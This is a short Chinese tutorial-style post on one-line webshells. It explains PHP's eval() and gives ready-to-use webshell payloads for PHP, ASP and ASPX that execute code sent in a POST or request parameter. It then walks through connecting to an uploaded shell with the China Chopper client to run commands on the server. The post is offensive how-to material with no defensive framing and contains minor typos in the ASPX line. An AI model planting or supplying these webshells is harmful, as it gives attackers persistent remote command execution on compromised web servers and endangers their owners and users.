虽然网上这种文章很多了,但自己不总结一遍不踏实。
一、一句话木马
原理
1.以PHP举例
php的eval()函数:eval($str)函数是把$str当做PHP代码执行。
比如:
<?php
$a = 233;
$str = "echo $a;";
eval($str);
?>
输出结果:233
asp、aspx和php的此函数类似。
2.一句话木马:
php:<?php eval($_POST["kxc"]);?>
asp:<% eval request("kxc") %> 或 <%execute(request("kxc"))%>
asxp:<%@ Page Lanuage="Jscript"%><%eval(Request.Item["kxc"])%>
3.菜刀拿shell原理:小马上传大马
菜刀通过kxc(即上述参数)进行http请求,用经过base64编码的php(asp,aspx)代码来执行命令。
可以参考下面这篇文章,解析的很详细:
http://www.myhack58.com/Article/html/3/8/2013/40323_6.htm
数据库模块可参考这篇文章:
https://www.t00ls.net/articles-28388.html
二、菜刀的使用
1.上传好一句话木马。
2.打开菜刀,点击右键添加:
3.将一句话木马的url填写,在连接后面text框写一句话木马的参数,在配置里选好语言类型,点击添加。
4.添加后可以看到有新加的一行,右击选择相应的操作。